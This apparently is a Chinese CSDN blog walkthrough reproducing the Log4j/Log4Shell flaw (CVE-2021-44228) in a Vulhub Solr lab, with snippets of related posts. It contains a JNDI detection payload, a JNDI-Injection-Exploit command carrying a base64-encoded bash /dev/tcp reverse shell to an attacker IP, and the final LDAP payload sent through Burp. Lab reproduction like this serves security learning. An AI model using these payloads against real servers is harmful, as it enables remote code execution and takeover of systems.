利用Vulhub复现log4j漏洞CVE-2021-44228

最新推荐文章于 2024-04-29 21:21:45 发布
最新推荐文章于 2024-04-29 21:21:45 发布
阅读量744 收藏 2
点赞数 1
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/127140914
版权

利用Vulhub复现log4j漏洞CVE-2021-44228

  • 利用Vulhub搭建好log4j漏洞靶场然后

  • 得到网站:

    在这里插入图片描述

    找到漏洞利用点:

    solr/admin/cores?action=

    在这里插入图片描述
    可以利用http://www.dnslog.cn/ 申请一个dns域名进行检测

    利用

    ?action=${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}

    进行检测

    漏洞利用:

    利用工具JNDI-Injection-Exploit搭建服务:格式:

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "命令" -A "ip(攻击机)"

    这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。

    接下来要实现反弹shell,可以用命令

    bash -i >& /dev/tcp/192.168.31.46/6666 0>&1

    base64进行编码的得到:

    在这里插入图片描述

    运行JNDI-Injection-Exploit搭建服务器:

     java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjQ2LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.31.46"

    在这里插入图片描述

    监听6666端口:

    在这里插入图片描述

    在利用burpsuite发送playload:

    ${jndi:ldap://192.168.31.46:1389/rq989a}

    成功反弹shell:

    在这里插入图片描述

    参考博客:

    https://blog.csdn.net/god_001/article/details/124461938

南冥~
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
log4j漏洞
Massimo__JAVA的博客
08-03 344
Log4j是由Apache提供的日志操作包,用于帮助用户处理日志信息。通过Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件、甚至是套接口服务器等各种地方。
ArcGIS漏洞修补工具(Log4J)
01-18
ArcGIS Enterprise 10.9.1及以下版本的 log4j 漏洞修补工具
利用Vulhublog4j漏洞
god_001的博客
04-27 4027
Vulhub 搭建log4j漏洞环境,模拟攻击: 靶机: 首先进入log4j路径 cd vulhub/log4j/CVE-2021-44228/ 搭建环境 sudo docker-compose build sudo docker-compose up -d 网址输入:http://127.0.0.1:8983/admin/cores 在DNSlog网站生成域名:jkvl0r.dnslog.cn 输入http://127.0.0.1:8983/admin/cores?action
VULHUBlog4j反序列化漏洞-CVE-2021-44228
最新发布
carrot11223的博客
04-29 1061
下载利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。我是用了yakit生成了一个可用域名,当然直接去dnslog平台生成也可以,但是我用习惯这个地方了,还是相当好用的一款国产化漏洞挖掘集成器。看这篇文章吧直接:https://blog.csdn.net/FisrtBqy/article/details/130680143。bash编码一下:https://www.sqlsec.com/rce/
vulhub漏洞CVE-2021-44228 Apache Log4j 远程代码执行漏洞
RexHa的博客
03-01 2245
一、漏洞详情Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。JNDI注入漏洞JNDI (Java Naming and Directory Interface) 是一组应用程序接口,它为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定位用户、网络、机器、对象和服务等各种资源。JNDI底层支持RMI远程对象,RMI注册的服务可以通过JNDI接口来访问和调用。
vulhublog4j
haoaaao的博客
05-02 1299
0x00 CVE-2017-5645(反序列化) 1、介绍 ApacheLog4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用漏洞执行任意代码。 2、搭建 docker 3、 使用ysoserial生成payload,然后发送给your-ip:4712端口 java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-..
Log4J 漏洞
qq_42307546的博客
12-13 2826
介绍:log4j是一个用Java编写的可靠,快速和灵活的日志框架(API),它在Apache软件许可下发布 log4j存在远程代码执行漏洞,通过lookup来触发漏洞详情参考 https://zhuanlan.zhihu.com/p/444140910 首先我们需要编写一个恶意的类然后编译成class文件 public class Exploit { public Exploit(){ try{ // 要执行的命令 String[] comma
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
Log4j漏洞
m1287578441的博客
06-08 2918
Log4j漏洞
网络安全 log4j漏洞
jazzz98的博客
06-19 3701
log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。
Apache log4j漏洞
lizhe0327的博客
12-17 4052
Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求 漏洞只针对的是2.15以下版本的 在我们来重一下log4j的漏洞 public class Log4jTest { private static final Logger log = LogManager.getLogger(); public s
apache log4j CVE-2021-44228漏洞怎么解决
06-03
Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修漏洞的版本2.17.0,建议用户尽快升级到该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值